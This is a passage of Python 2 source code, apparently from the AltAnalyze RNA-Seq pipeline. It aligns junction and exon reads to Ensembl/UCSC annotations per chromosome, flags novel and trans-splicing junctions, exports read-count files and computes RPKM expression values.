deleteOldAnnotations(species,root_dir,dataset_name)
###Define variables to report once reads for all chromosomes have been aligned
#global self.known_count; global self.novel_junction_count; global self.one_found; global self.not_found; global self.both_found; global self.trans_splicing_reads
#global self.junctions_without_exon_gene_alignments; global self.exons_without_gene_alignment_count; global self.junction_simple_db; global self.chr_strand_gene_dbs
self.known_count=0; self.novel_junction_count=0; self.one_found=0; self.not_found=0; self.both_found=0; self.trans_splicing_reads=0
self.junctions_without_exon_gene_alignments=0; self.exons_without_gene_alignment_count=0; self.junction_simple_db={}
###Begin Chromosome specific read to exon alignments
self.chr_strand_gene_dbs,self.location_gene_db,chromosomes,self.gene_location_db = getChromosomeStrandCoordinates(species,testImport)
self.chromosomes = chromosomes
print "Processing exon/junction coordinates sequentially by chromosome"
print "Note: this step is time intensive (can be hours) and no print statements may post for a while"
def outputResults(self):
exportDatasetLinkedGenes(self.species,self.gene_location_db,self.root_dir) ### Include an entry for gene IDs to include constitutive expression for RPKM normalized data
chr_gene_locations=[]; self.location_gene_db=[]; self.chr_strand_gene_dbs=[]
#print 'user coordinates imported/processed'
#print 'Importing read counts from coordinate data...'
biotypes = self.biotypes_store
### Output summary statistics
if self.normalize_feature_exp != 'none':
print self.normalize_feature_exp, 'normalization complete'
if 'junction' in biotypes:
print 'Imported Junction Statistics:'
print ' ',self.known_count, 'junctions found in Ensembl/UCSC and',self.novel_junction_count,'are novel'
print ' ',self.trans_splicing_reads,'trans-splicing junctions found (two aligning Ensembl genes)'
print ' ',self.junctions_without_exon_gene_alignments, 'junctions where neither splice-site aligned to a gene'
if (float(self.known_count)*10)<float(self.novel_junction_count):
print '\nWARNING!!!!! Few junctions aligned to known exons. Ensure that the AltAnalyze Ensembl database\nversion matches the genome build aligned to!\n'
if 'exon' in biotypes:
print 'Imported Exon Statistics:'
print ' ',self.exons_without_gene_alignment_count, 'exons where neither aligned to a gene'
print 'User databases and read counts written to:', self.root_dir[:-1]+'ExpressionInput'
### END CHROMOSOME SPECIFIC ANALYSES
if self.exonBedBuildStatus == 'yes':
bedfile = moveBAMtoBEDFile(self.species,self.dataset_name,self.root_dir)
print 'Exon BED file updated with novel exon predictions from junction file'
return bedfile; sys.exit()
clearObjectsFromMemory(self.junction_simple_db); self.junction_simple_db=[]
return biotypes
def test(self, search_chr):
print search_chr
def __call__(self, queue, search_chr):
try:
#sys.stdout = self.stdout
platformType = self.platformType
testImport = self.testImport
species = self.species
dataset_name = self.dataset_name
platformType = self.platformType
analysisMode = self.analysisMode
root_dir = self.root_dir
normalize_feature_exp = self.normalize_feature_exp
bed_dir = self.bed_dir
chr_status = self.chr_status
junction_annotations={}
if chr_status == False:
searchchr = string.replace(search_chr,'chr','')
else:
searchchr = search_chr
if platformType == 'RNASeq':
junction_db,biotypes,algorithms = importBEDFile(bed_dir,root_dir,species,normalize_feature_exp,searchChr=searchchr,testImport=testImport)
else:
normalize_feature_exp = 'quantile'
junction_db,biotypes,algorithms = importExpressionMatrix(bed_dir,root_dir,species,fl,'no',search_chr=searchchr)
self.biotypes_store = biotypes
if len(junction_db)>0:
### Determine which kind of data is being imported, junctions, exons or both
unmapped_exon_db={}
if 'junction' in biotypes:
### Get all known junction splice-sites
ens_junction_coord_db = importExonAnnotations(species,'junction_coordinates',search_chr)
if testImport == 'yes':
print len(ens_junction_coord_db),'Ensembl/UCSC junctions imported'
### Identify known junctions sites found in the experimental dataset (perfect match)
novel_junction_db={}; novel_exon_db={}
for key in junction_db:
ji=junction_db[key]
if ji.BioType()=='junction':
if key in ens_junction_coord_db:
jd=ens_junction_coord_db[key]
ji.setExonAnnotations(jd)
self.known_count+=1
else:
novel_junction_db[key]=junction_db[key]; self.novel_junction_count+=1
#if 75953254 in key: print key; sys.exit()
else:
unmapped_exon_db[key]=junction_db[key]
ens_exon_db = importExonAnnotations(species,'exon',search_chr)
if 'junction' in biotypes:
if testImport == 'yes':
print self.known_count, 'junctions found in Ensembl/UCSC and',len(novel_junction_db),'are novel.'
### Separate each junction into a 5' and 3' splice site (exon1_coord_db and exon2_coord_db)
exon1_coord_db={}; exon2_coord_db={}
for (chr,exon1_stop,exon2_start) in ens_junction_coord_db:
jd = ens_junction_coord_db[(chr,exon1_stop,exon2_start)]
exon1_coord_db[chr,exon1_stop] = jd.GeneID(),string.split(jd.ExonRegionIDs(),'-')[0]
exon2_coord_db[chr,exon2_start] = jd.GeneID(),string.split(jd.ExonRegionIDs(),'-')[1]
clearObjectsFromMemory(ens_junction_coord_db); ens_junction_coord_db=[] ### Clear object from memory
### Get and re-format individual exon info
exon_region_db={}
#if 'exon' not in biotypes:
for gene in ens_exon_db:
for rd in ens_exon_db[gene]:
exon_region_db[gene,rd.ExonRegionIDs()]=rd
### Add the exon annotations from the known junctions to the exons to export dictionary
exons_to_export={}
for key in junction_db:
ji=junction_db[key]
if ji.ExonAnnotations() != None:
jd = ji.ExonAnnotations()
exon1, exon2 = string.split(jd.ExonRegionIDs(),'-')
key1 = jd.GeneID(),exon1; key2 = jd.GeneID(),exon2
exons_to_export[key1] = exon_region_db[key1]
exons_to_export[key2] = exon_region_db[key2]
### For novel experimental junctions, identify those with at least one matching known 5' or 3' site
exons_not_identified = {}; novel_exon_coordinates={}
for (chr,exon1_stop,exon2_start) in novel_junction_db:
ji = novel_junction_db[(chr,exon1_stop,exon2_start)]
coord = [exon1_stop,exon2_start]; coord.sort()
if (chr,exon1_stop) in exon1_coord_db and (chr,exon2_start) in exon2_coord_db:
### Assign exon annotations to junctions where both splice-sites are known in Ensembl/UCSC
### Store the exon objects, genes and regions (le is a tuple of gene and exon region ID)
### Do this later for the below un-assigned exons
le=exon1_coord_db[(chr,exon1_stop)]; ji.setLeftExonAnnotations(le); ji.setLeftExonRegionData(exon_region_db[le])
re=exon2_coord_db[(chr,exon2_start)]; ji.setRightExonAnnotations(re); ji.setRightExonRegionData(exon_region_db[re])
if le[0] != re[0]: ### Indicates Trans-splicing (e.g., chr7:52,677,568-52,711,750 mouse mm9)
ji.setTransSplicing(); #print exon1_stop,le,exon2_start,re,ji.Chr(),ji.Strand()
self.both_found+=1; #print 'five',(chr,exon1_stop,exon2_start),exon1_coord_db[(chr,exon1_stop)]
else:
if (chr,exon1_stop) in exon1_coord_db: ### hence, exon1_stop is known, so report the coordinates of exon2 as novel
le=exon1_coord_db[(chr,exon1_stop)]; ji.setLeftExonAnnotations(le)
self.one_found+=1; #print 'three',(chr,exon1_stop,exon2_start),exon1_coord_db[(chr,exon1_stop)]
novel_exon_coordinates[ji.Chr(),exon2_start] = ji,'left',ji.Exon2Stop() ### Employ this strategy to avoid duplicate exons with differing lengths (mainly an issue if analyzing only exons results)
ji.setNovel('side')
elif (chr,exon2_start) in exon2_coord_db: ### hence, exon2_start is known, so report the coordinates of exon1 as novel
re=exon2_coord_db[(chr,exon2_start)]; ji.setRightExonAnnotations(re) ### In very rare cases, a gene can be assigned here, even though the splice-site is on the opposite strand (not worthwhile filtering out)
self.one_found+=1; #print 'three',(chr,exon1_stop,exon2_start),exon1_coord_db[(chr,exon1_stop)]
novel_exon_coordinates[ji.Chr(),exon1_stop] = ji,'right',ji.Exon1Start()
ji.setNovel('side')
else:
self.not_found+=1; #if self.not_found < 10: print (chr,exon1_stop,exon2_start)
novel_exon_coordinates[ji.Chr(),exon1_stop] = ji,'right',ji.Exon1Start()
novel_exon_coordinates[ji.Chr(),exon2_start] = ji,'left',ji.Exon2Stop()
ji.setNovel('both')
### We examine reads where one splice-site aligns to a known but the other not, to determine if trans-splicing occurs
try: exons_not_identified[chr,ji.Strand()].append((coord,ji))
except KeyError: exons_not_identified[chr,ji.Strand()] = [(coord,ji)]
"""
if fl.ExonBedBuildStatus() == 'no':
exportNovelJunctions(species,novel_junction_db,condition_count_db,root_dir,dataset_name,'junction') ### Includes known exons
"""
#print self.both_found, ' where both and', self.one_found, 'where one splice-site are known out of',self.both_found+self.one_found+self.not_found
#print 'Novel junctions where both splice-sites are known:',self.both_found
#print 'Novel junctions where one splice-site is known:',self.one_found
#print 'Novel junctions where the splice-sites are not known:',self.not_found
clearObjectsFromMemory(exon_region_db); exon_region_db=[] ### Clear memory of this object
read_aligned_to_gene=0
for (chr,strand) in exons_not_identified:
if (chr,strand) in self.chr_strand_gene_dbs:
chr_gene_locations = self.chr_strand_gene_dbs[chr,strand]
chr_reads = exons_not_identified[chr,strand]
chr_gene_locations.sort(); chr_reads.sort()
### Set GeneID for each coordinate object (primary and seconardary GeneIDs)
read_aligned_to_gene=geneAlign(chr,chr_gene_locations,self.location_gene_db,chr_reads,'no',read_aligned_to_gene)
#print read_aligned_to_gene, 'novel junctions aligned to Ensembl genes out of',self.one_found+self.not_found
clearObjectsFromMemory(exons_not_identified); exons_not_identified=[] ## Clear memory of this object
for key in novel_junction_db:
(chr,exon1_stop,exon2_start) = key
ji=novel_junction_db[key]
if ji.GeneID() == None:
try:
if ji.SecondaryGeneID() != None:
### Occurs if mapping is to the 5'UTR of a gene for the left splice-site (novel alternative promoter)
ji.setGeneID(ji.SecondaryGeneID()); ji.setSecondaryGeneID(''); #print key, ji.GeneID(), ji.Strand(), ji.SecondaryGeneID()
except Exception: null=[]
if ji.GeneID() != None:
geneid = ji.GeneID()
proceed = 'no'
if ji.SpliceSitesFound() == None: proceed = 'yes'; coordinates = [exon1_stop,exon2_start]
elif ji.SpliceSitesFound() == 'left': proceed = 'yes'; coordinates = [exon1_stop,exon2_start]
elif ji.SpliceSitesFound() == 'right': proceed = 'yes'; coordinates = [exon1_stop,exon2_start]
if proceed == 'yes':
for coordinate in coordinates:
if ji.TransSplicing() == 'yes':
#print ji.Chr(),ji.GeneID(), ji.SecondaryGeneID(), ji.Exon1Stop(), ji.Exon2Start()
self.trans_splicing_reads+=1
if ji.checkExonPosition(coordinate) == 'right': geneid = ji.SecondaryGeneID()
if abs(exon2_start-exon1_stop)==1: eventType = 'novel-exon-intron' ### Indicates intron-exon boundary (intron retention)
else: eventType = 'novel'
exon_data = (coordinate,ji.Chr()+'-'+str(coordinate),eventType)
try: novel_exon_db[geneid].append(exon_data)
except KeyError: novel_exon_db[geneid] = [exon_data]
else:
### write these out
self.junctions_without_exon_gene_alignments+=1
### Remove redundant exon entries and store objects
for key in novel_exon_db:
exon_data_objects=[]
exon_data_list = unique.unique(novel_exon_db[key])
exon_data_list.sort()
for e in exon_data_list:
ed = ExonInfo(e[0],e[1],e[2])
exon_data_objects.append(ed)
novel_exon_db[key] = exon_data_objects
#print self.trans_splicing_reads,'trans-splicing junctions found (two aligning Ensembl genes).'
#print self.junctions_without_exon_gene_alignments, 'junctions where neither splice-site aligned to a gene'
#if 'X' in search_chr: print len(ens_exon_db),len(ens_exon_db['ENSMUSG00000044424'])
alignReadsToExons(novel_exon_db,ens_exon_db,testImport=testImport)
### Link exon annotations up with novel junctions
junction_region_db,exons_to_export = annotateNovelJunctions(novel_junction_db,novel_exon_db,exons_to_export)
### Add the exon region data from known Ensembl/UCSC matched junctions to junction_region_db for recipricol junction analysis
for key in junction_db:
ji=junction_db[key]; jd = ji.ExonAnnotations()
try:
uid = jd.GeneID()+':'+jd.ExonRegionIDs(); ji.setUniqueID(uid)
try: junction_region_db[jd.GeneID()].append((formatID(uid),jd.ExonRegionIDs()))
except KeyError: junction_region_db[jd.GeneID()] = [(formatID(uid),jd.ExonRegionIDs())]
except AttributeError: null=[] ### Occurs since not all entries in the dictionary are perfect junction matches
try: novel_exon_coordinates = collapseNoveExonBoundaries(novel_exon_coordinates,root_dir+dataset_name) ### Joins inferred novel exon-IDs (5' and 3' splice sites) from adjacent and close junction predictions
except Exception: pass ### No errors encountered before
#if self.exonBedBuildStatus == 'yes':
### Append to the exported BED format exon coordinate file
bedfile = exportNovelExonToBedCoordinates(species,novel_exon_coordinates,chr_status,searchChr=searchchr)
### Identify reciprocol junctions and retrieve splice-event annotations for exons and inclusion junctions
junction_annotations,critical_exon_annotations = JunctionArray.inferJunctionComps(species,('RNASeq',junction_region_db,root_dir),searchChr=searchchr)
clearObjectsFromMemory(junction_region_db); junction_region_db=[]
### Reformat these dictionaries to combine annotations from multiple reciprocol junctions
junction_annotations = combineExonAnnotations(junction_annotations)
critical_exon_annotations = combineExonAnnotations(critical_exon_annotations)
if 'exon' in biotypes:
if testImport == 'yes':
print len(unmapped_exon_db),'exon genomic locations imported.'
### Create a new dictionary keyed by chromosome and strand
exons_not_aligned={}
for (chr,exon1_stop,exon2_start) in unmapped_exon_db:
ji = unmapped_exon_db[(chr,exon1_stop,exon2_start)]
coord = [exon1_stop,exon2_start]; coord.sort()
try: exons_not_aligned[chr,ji.Strand()].append((coord,ji))
except KeyError: exons_not_aligned[chr,ji.Strand()] = [(coord,ji)]
read_aligned_to_gene=0
for (chr,strand) in exons_not_aligned:
if (chr,strand) in self.chr_strand_gene_dbs:
chr_gene_locations = self.chr_strand_gene_dbs[chr,strand]
chr_reads = exons_not_aligned[chr,strand]
chr_gene_locations.sort(); chr_reads.sort()
read_aligned_to_gene=geneAlign(chr,chr_gene_locations,self.location_gene_db,chr_reads,'no',read_aligned_to_gene)
#print read_aligned_to_gene, 'exons aligned to Ensembl genes out of',self.one_found+self.not_found
align_exon_db={}; exons_without_gene_alignments={}; multigene_exon=0
for key in unmapped_exon_db:
(chr,exon1_stop,exon2_start) = key
ji=unmapped_exon_db[key]
if ji.GeneID() == None:
try:
if ji.SecondaryGeneID() != None:
### Occurs if mapping outside known exon boundaries for one side of the exon
ji.setGeneID(ji.SecondaryGeneID()); ji.setSecondaryGeneID(''); #print key, ji.GeneID(), ji.Strand(), ji.SecondaryGeneID()
except Exception: null=[]
else:
if 'ENS' in ji.JunctionID():
if ji.GeneID() not in ji.JunctionID(): ### Hence, there were probably two overlapping Ensembl genes and the wrong was assigned based on the initial annotations
original_geneid = string.split(ji.JunctionID(),':')[0]
if original_geneid in ens_exon_db: ji.setGeneID(original_geneid) #check if in ens_exon_db (since chromosome specific)
if ji.GeneID() != None:
geneid = ji.GeneID()
coordinates = [exon1_stop,exon2_start]
for coordinate in coordinates:
if ji.TransSplicing() != 'yes': ### This shouldn't occur for exons
exon_data = (coordinate,ji.Chr()+'-'+str(coordinate),'novel')
try: align_exon_db[geneid].append(exon_data)
except KeyError: align_exon_db[geneid] = [exon_data]
else:
multigene_exon+=1 ### Shouldn't occur due to a fix in the gene-alignment method which will find the correct gene on the 2nd interation
else: exons_without_gene_alignments[key]=ji; self.exons_without_gene_alignment_count+=1
### Remove redundant exon entries and store objects (this step may be unnecessary)
for key in align_exon_db:
exon_data_objects=[]
exon_data_list = unique.unique(align_exon_db[key])
exon_data_list.sort()
for e in exon_data_list:
ed = ExonInfo(e[0],e[1],e[2])
exon_data_objects.append(ed)
align_exon_db[key] = exon_data_objects
#print self.exons_without_gene_alignment_count, 'exons where neither aligned to a gene'
#if self.exons_without_gene_alignment_count>3000: print 'NOTE: Poor mapping of these exons may be due to an older build of\nEnsembl than the current version. Update BAMtoBED mappings to correct.'
begin_time = time.time()
alignReadsToExons(align_exon_db,ens_exon_db)
end_time = time.time()
if testImport == 'yes':
print 'Exon sequences aligned to exon regions in',int(end_time-begin_time),'seconds'
### Combine the start and end region alignments into a single exon annotation entry
combineDetectedExons(unmapped_exon_db,align_exon_db,novel_exon_db)
clearObjectsFromMemory(unmapped_exon_db); clearObjectsFromMemory(align_exon_db); clearObjectsFromMemory(novel_exon_db)
unmapped_exon_db=[]; align_exon_db=[]; novel_exon_db=[]
"""
if fl.ExonBedBuildStatus() == 'no':
exportNovelJunctions(species,exons_without_gene_alignments,condition_count_db,root_dir,dataset_name,'exon') ### Includes known exons
"""
clearObjectsFromMemory(exons_without_gene_alignments); exons_without_gene_alignments=[]
### Export both exon and junction annotations
if 'junction' in biotypes:
### Export the novel user exon annotations
exportDatasetLinkedExons(species,exons_to_export,critical_exon_annotations,root_dir,testImport=testImport,searchChr=searchchr)
### Export the novel user exon-junction annotations (original junction_db objects updated by above processing)
exportDatasetLinkedJunctions(species,junction_db,junction_annotations,root_dir,testImport=testImport,searchChr=searchchr)
### Clear memory once results are exported (don't want to delete actively used objects)
if 'junction' in biotypes:
clearObjectsFromMemory(exons_to_export); clearObjectsFromMemory(critical_exon_annotations)
clearObjectsFromMemory(novel_junction_db); novel_junction_db=[]
clearObjectsFromMemory(novel_exon_coordinates); novel_exon_coordinates=[]
exons_to_export=[]; critical_exon_annotations=[]
clearObjectsFromMemory(exon1_coord_db); clearObjectsFromMemory(exon2_coord_db)
exon1_coord_db=[]; exon2_coord_db=[]
if 'exon' in biotypes:
clearObjectsFromMemory(exons_not_aligned); exons_not_aligned=[]
clearObjectsFromMemory(ens_exon_db); ens_exon_db=[]
### Add chromsome specific junction_db data to a simple whole genome dictionary
for key in junction_db:
ji = junction_db[key]
if ji.GeneID()!=None and ji.UniqueID()!=None: self.junction_simple_db[key]=ji.UniqueID()
#returnLargeGlobalVars()
clearObjectsFromMemory(junction_db); clearObjectsFromMemory(junction_annotations)
junction_db=[]; junction_annotations=[]; chr_reads=[]
for biotype in biotypes:
### Import Read Counts (do this last to conserve memory)
if platformType == 'RNASeq':
condition_count_db,exon_len_db,biotypes2,algorithms = importBEDFile(bed_dir,root_dir,species,normalize_feature_exp,getReads=True,searchChr=searchchr,getBiotype=biotype,testImport=testImport,filteredJunctions=self.junction_simple_db)
else:
condition_count_db,exon_len_db,biotypes2,algorithms = importExpressionMatrix(bed_dir,root_dir,species,fl,'yes',getBiotype=biotype)
###First export original counts, rather than quantile normalized or RPKM
self.exportJunctionCounts(species,self.junction_simple_db,exon_len_db,condition_count_db,root_dir,dataset_name,biotype,'counts',searchChr=searchchr)
clearObjectsFromMemory(condition_count_db); clearObjectsFromMemory(exon_len_db); condition_count_db=[]; exon_len_db=[]
if analysisMode == 'commandline':
print 'finished parsing data for chromosome:',search_chr ### Unix platforms are not displaying the progress in real-time
else:
pass #print "*",
try: queue.put([self.biotypes_store, self.known_count, self.novel_junction_count, self.trans_splicing_reads, self.junctions_without_exon_gene_alignments, self.exons_without_gene_alignment_count])
except Exception:
### If queue is not a multiprocessing object
queue = [self.biotypes_store, self.known_count, self.novel_junction_count, self.trans_splicing_reads, self.junctions_without_exon_gene_alignments, self.exons_without_gene_alignment_count]
return queue
except Exception:
print traceback.format_exc()
error(traceback.format_exc())
multiprocessing.log_to_stderr().setLevel(logging.DEBUG)
raise
def exportJunctionCounts(self,species,junction_simple_db,exon_len_db,condition_count_db,root_dir,dataset_name,biotype,count_type,searchChr=None):
if 'exp.' not in dataset_name: dataset_name = 'exp.'+dataset_name
if '.txt' not in dataset_name: dataset_name+='.txt'
export_path = root_dir+'ExpressionInput/'+dataset_name
if count_type == 'counts':
export_path = string.replace(export_path,'exp.','counts.') ### separately export counts
if searchChr !=None:
export_path = string.replace(export_path,'ExpressionInput','ExpressionInput/Counts')
export_path = string.replace(export_path,'.txt','.'+searchChr+'.txt')
self.countsFile = export_path
if self.testImport == 'yes':
print 'Writing',export_path
export_data,status = AppendOrWrite(export_path)
if status == 'not found':
title = ['AltAnalyze_ID']
for condition in condition_count_db: title.append(condition)
export_data.write(string.join(title,'\t')+'\n')
for key in self.junction_simple_db:
chr,exon1_stop,exon2_start = key
if biotype == 'junction':
coordinates = chr+':'+str(exon1_stop)+'-'+str(exon2_start)
elif biotype == 'exon':
coordinates = chr+':'+str(exon1_stop-1)+'-'+str(exon2_start+1)
try:
null=exon_len_db[key]
if count_type == 'counts': values = [self.junction_simple_db[key]+'='+coordinates]
else: values = [self.junction_simple_db[key]]
for condition in condition_count_db: ###Memory crash here
count_db = condition_count_db[condition]
try: read_count = count_db[key]
except KeyError: read_count = '0'
values.append(read_count)
export_data.write(string.join(values,'\t')+'\n')
except Exception: null=[]
export_data.close()
def countsDir(self):
return self.countsFile
def calculateRPKMsFromGeneCounts(filename,species,AdjustExpression):
""" Manual way of calculating gene RPKMs from gene counts only """
gene_lengths = getGeneExonLengths(species)
fastRPKMCalculate(filename,GeneLengths=gene_lengths,AdjustExpression=AdjustExpression)
def fastRPKMCalculate(counts_file,GeneLengths=None,AdjustExpression=True):
export_path = string.replace(counts_file,'counts.','exp.')
export_data = export.ExportFile(export_path) ### Write this new file
fn=filepath(counts_file); header=True
exon_sum_array=[]; junction_sum_array=[]
for line in open(fn,'rU').xreadlines():
data = cleanUpLine(line)
t = string.split(data,'\t')
if header:
samples = t[1:]
header=False
exon_sum_array=[0]*len(samples)
junction_sum_array=[0]*len(samples)
else:
try: values = map(float,t[1:])
except Exception:
print traceback.format_exc()
print t
badCountsLine
### get the total reads/sample
if '-' in string.split(t[0],'=')[0]:
junction_sum_array = [sum(value) for value in zip(*[junction_sum_array,values])]
else:
exon_sum_array = [sum(value) for value in zip(*[exon_sum_array,values])]
with warnings.catch_warnings():
warnings.filterwarnings("ignore",category=RuntimeWarning) ### hides warnings associated with Scipy for n=1 sample comparisons
jatr=Average(junction_sum_array) # Average of the total maped reads
eatr=Average(exon_sum_array) # Average of the total maped reads
if AdjustExpression:
offset = 1
else:
offset = 0
header=True
c=math.pow(10.0,9.0)
for line in open(fn,'rU').xreadlines():
data = cleanUpLine(line)
t = string.split(data,'\t')
if header:
export_data.write(line) ### Write header
header=False
else:
try:
exon_id,coordinates = string.split(t[0],'=')
coordinates = string.split(coordinates,':')[1]
coordinates = string.split(coordinates,'-')
l=abs(int(coordinates[1])-int(coordinates[0])) ### read-length
except Exception: ### Manual way of calculating gene RPKMs from gene counts only
exon_id = t[0]
try: l = GeneLengths[exon_id]
except Exception: continue #Occurs when Ensembl genes supplied from an external analysis
try: read_counts = map(lambda x: int(x)+offset, t[1:])
except Exception: read_counts = map(lambda x: int(float(x))+offset, t[1:])
if '-' in exon_id:
count_stats = zip(read_counts,junction_sum_array)
atr = jatr
l=60
else:
count_stats = zip(read_counts,exon_sum_array)
atr = eatr
values=[]
#rpkm = map(lambda (r,t): c*(r/(t*l)), count_stats) ### Efficent way to convert to rpkm, but doesn't work for 0 counts
for (r,t) in count_stats:
if r == 1: ###This adjustment allows us to obtain more realist folds where 0 is compared and use log2
t = atr
try:
rpkm = str(c*(r/(t*l)))
#print c,r,t,l,exon_id,rpkm;sys.exit()
values.append(rpkm)
except Exception,e:
print e
print t[0]
print 'Error Encountered... Exon or Junction of zero length encoutered... RPKM failed... Exiting AltAnalyze.'
print 'This error may be due to inconsistent file naming. If both exon and junction sample data is present, make sure they are named propperly.'
print 'For example: cancer1__exon.bed, cancer1__junction.bed (double underscore required to match these samples up)!'
print [r,t,l];k=1; forceError
values = string.join([exon_id]+values,'\t')+'\n'
export_data.write(values)
export_data.close()
def mergeCountFiles(counts_file1,counts_file2):
### Used internally to merge count files that are very large and too time-consuming to recreate (regenerate them)
export_path = string.replace(counts_file2,'counts.','temp-counts.')
export_data = export.ExportFile(export_path) ### Write this new file
fn=filepath(counts_file1); header=True
count_db={}
for line in open(fn,'rU').xreadlines():
data = cleanUpLine(line)
t = string.split(data,'\t')
if header:
samples = t[1:]
header=False
si = samples.index('H9.102.2.5.bed')+1
else:
try: value = t[si]
except Exception: print t; sys.exit()
### get the total reads/sample
count_db[t[0]] = value
fn=filepath(counts_file2); header=True
for line in open(fn,'rU').xreadlines():
data = cleanUpLine(line)
t = string.split(data,'\t')
if header:
samples = t[1:]
header=False
si = samples.index('H9.102.2.5.bed')+1
export_data.write(line)
else:
try: t[si] = count_db[t[0]]
except Exception: pass ### keep the current value
export_data.write(string.join(t,'\t')+'\n')
export_data.close()
def getGeneExonLengths(species):
gene_lengths={}
filename = 'AltDatabase/'+species+'/RNASeq/'+species+'_Ensembl_exons.txt'
fn=filepath(filename)
firstLine=True
for line in open(fn,'rU').xreadlines():
line = line.rstrip('\n')
if firstLine:
firstLine=False
else:
t = string.split(line,'\t')
geneID = t[2]; start = int(t[6]); end = int(t[7]); exonID = t[1]
if 'E' in exonID:
try: gene_lengths[geneID]+=abs(end-start)
except Exception: gene_lengths[geneID]=abs(end-start)
return gene_lengths
def importRawCountData(filename,expressed_gene_exon_db,excludeLowExp=True):
""" Identifies exons or junctions to evaluate gene-level expression. This function, as it is currently written:
1) examines the RPKM and original read counts associated with all exons
2) removes exons/junctions that do not meet their respective RPKM AND read count cutoffs
3) returns ONLY those exons and genes deemed expressed, whether constitutive selected or all exons
"""
### Get expression values for exon/junctions to analyze
seq_ids_to_import={}
for gene in expressed_gene_exon_db:
for exonid in expressed_gene_exon_db[gene]: seq_ids_to_import[exonid]=[]
### Define thresholds
exon_exp_threshold = UserOptions.ExonExpThreshold()
junction_exp_threshold = UserOptions.JunctionExpThreshold()
exon_rpkm_threshold = UserOptions.ExonRPKMThreshold()
gene_rpkm_threshold = UserOptions.RPKMThreshold()
gene_exp_threshold = UserOptions.GeneExpThreshold()
### Import RPKM normalized expression values
fn=filepath(filename); x=0; rpkm_dbase={}
for line in open(fn,'rU').xreadlines():
data = cleanUpLine(line)
t = string.split(data,'\t')
if x==0: array_names = t[1:]; x=1
else:
exon_id=t[0]
max_count=max(map(float,t[1:]))
if max_count>=exon_rpkm_threshold or excludeLowExp==False: rpkm_dbase[exon_id]=[] ### Only retain exons/junctions meeting the RPKM threshold
### Import non-normalized original counts
counts_filename = string.replace(filename,'exp.','counts.')
fn=filepath(counts_filename); x=0; exp_dbase={}
all_exp_features={} ### Don't filter for only gene-expression reporting
for line in open(fn,'rU').xreadlines():
data = cleanUpLine(line)
t = string.split(data,'\t')
if x==0: array_names = t[1:]; x=1
else:
exon_id,coordinates = string.split(t[0],'=')
coordinates = string.split(coordinates,':')[1]
coordinates = string.split(coordinates,'-')
length=abs(int(coordinates[1])-int(coordinates[0]))
max_count=max(map(float,t[1:])); proceed = 'no'
if '-' in exon_id:
length = 60.0
if max_count>=junction_exp_threshold or excludeLowExp==False:
### Only considered when exon data is not present in the analysis
proceed = 'yes'
elif max_count>=exon_exp_threshold or excludeLowExp==False: proceed = 'yes'
if proceed == 'yes' and exon_id in rpkm_dbase: ### Ensures that the maximum sample (not group) user defined count threshold is achieved at the exon or junction-level
all_exp_features[exon_id]=None
if exon_id in seq_ids_to_import:### Forces an error if not in the steady-state pre-determined set (CS or all-exons) - INCLUDE HERE TO FILTER ALL FEATURES
exp_dbase[exon_id] = t[1:],length ### Include sequence length for normalization
for exon in exp_dbase: array_count = len(exp_dbase[exon][0]); break
try:null=array_count
except Exception:
print 'No exons or junctions considered expressed (based user thresholds). Exiting analysis.'; force_exit
return exp_dbase, all_exp_features, array_count
def importNormalizedCountData(filename,expressed_gene_exon_db):
### Get expression values for exon/junctions to analyze
seq_ids_to_import={}
for gene in expressed_gene_exon_db:
for exonid in expressed_gene_exon_db[gene]: seq_ids_to_import[exonid]=[]
### Define thresholds
exon_exp_threshold = UserOptions.ExonExpThreshold()
junction_exp_threshold = UserOptions.JunctionExpThreshold()
exon_rpkm_threshold = UserOptions.ExonRPKMThreshold()
gene_rpkm_threshold = UserOptions.RPKMThreshold()
gene_exp_threshold = UserOptions.GeneExpThreshold()
### Import non-normalized original counts
fn=filepath(filename); x=0; exp_dbase={}
all_exp_features={} ### Don't filter for only gene-expression reporting
for line in open(fn,'rU').xreadlines():
data = cleanUpLine(line)
t = string.split(data,'\t')
if x==0: array_names = t[1:]; x=1
else:
exon_id=t[0]; proceed = 'no'
max_count=max(map(float,t[1:]))
if '-' in exon_id:
if max_count>=junction_exp_threshold: proceed = 'yes'
elif max_count>=exon_exp_threshold: proceed = 'yes'
if proceed == 'yes': ### Ensures that the maximum sample (not group) user defined count threshold is achieved at the exon or junction-level
all_exp_features[exon_id]=None
if exon_id in seq_ids_to_import: ### If a "constitutive" or exon-level feature (filter missing prior to 2.0.8 - bug)
exp_dbase[exon_id] = t[1:],0 ### Add the zero just to comply with the raw count input format (indicates exon length)
for exon in exp_dbase: array_count = len(exp_dbase[exon][0]); break
return exp_dbase, all_exp_features, array_count
def obtainGeneCounts(expressed_gene_exon_db,species,exp_dbase,array_count,normalize_feature_exp,excludeLowExp=True):
###Calculate avg expression for each sample for each exon (using constitutive or all exon values)
if excludeLowExp == False:
gene_lengths = getGeneExonLengths(species)
steady_state_db={}
for gene in expressed_gene_exon_db:
x = 0; gene_sum=0
exon_list = expressed_gene_exon_db[gene]
while x < array_count:
exp_list=[]; len_list=[]
for exon in exon_list:
try:
exp_val = exp_dbase[exon][0][x]
if normalize_feature_exp == 'RPKM':
### Decided to include all exons, expressed or not to prevent including lowly expressed exons that are long, that can bias the expression call
#if float(exp_val) != 0: ### Here, we use the original raw count data, whereas above is the adjusted quantile or raw count data
exp_list.append(exp_val); len_list.append(exp_dbase[exon][1]) ### This is for RNASeq -> don't include undetected exons - made in v.204
else: exp_list.append(exp_val) #elif float(exp_val) != 1:
except KeyError: null =[] ###occurs if the expression exon list is missing some of these exons
try:
if len(exp_list)==0:
for exon in exon_list:
try:
exp_list.append(exp_dbase[exon][0][x]); len_list.append(exp_dbase[exon][1])
#kill
except KeyError: null=[] ### Gene entries will cause this error, since they are in the database but not in the count file
if normalize_feature_exp == 'RPKM':
sum_const_exp=sum(map(float,exp_list)); gene_sum+=sum_const_exp
sum_length=sum(len_list) ### can have different lengths for each sample, since only expressed exons are considered
if excludeLowExp == False:
sum_length = gene_lengths[gene] ### Uses the all annotated exon lengths
### Add only one avg-expression value for each array, this loop
try: steady_state_db[gene].append((sum_const_exp,sum_length))
except KeyError: steady_state_db[gene] = [(sum_const_exp,sum_length)]
else:
avg_const_exp=Average(exp_list)
if avg_const_exp != 1: gene_sum+=avg_const_exp
### Add only one avg-expression value for each array, this loop
try: steady_state_db[gene].append(avg_const_exp)
except KeyError: steady_state_db[gene] = [avg_const_exp]
except Exception: null=[] ### Occurs when processing a truncated dataset (for testing usually) - no values for the gene should be included
x += 1
if gene_sum==0:
